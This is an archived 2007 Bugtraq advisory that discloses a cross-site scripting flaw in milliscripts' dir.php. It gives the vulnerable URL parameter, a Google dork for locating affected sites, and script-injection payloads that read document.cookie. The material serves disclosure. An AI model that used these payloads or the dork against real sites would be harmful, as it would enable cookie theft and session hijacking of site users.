lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20071230165906.13492.qmail@securityfocus.com> Date: 30 Dec 2007 16:59:06 -0000 From: sys-project@...mail.com To: bugtraq@...urityfocus.com Subject: milliscripts (dir.php) Cross-Site Scripting Vulnerability # milliscripts (dir.php) Cross-Site Scripting Vulnerability # Download: # http://www.milliscripts.com/ # Bug found by Jose Luis Góngora Fernández / JosS # Contact: sys-project[at]hotmail.com # Spanish Hackers Team # www.spanish-hackers.com # /server irc.freenode.net /join #fullsecure # d0rk: "powered by milliscripts" # Stop lammer [*] Exploit In (XSS): ../PATH/dir.php?do=browse&cat=[XSS] http://www.example.com/PATH/dir.php?do=browse&cat=[XSS] [*] Cross Siting Scripting (Code): "><script>alert(document.cookie)</script> <script>alert(document.cookie)</script> //---------------------------------------\\ Greetz To: All Hackers Jose Luis Góngora Fernández / JosS!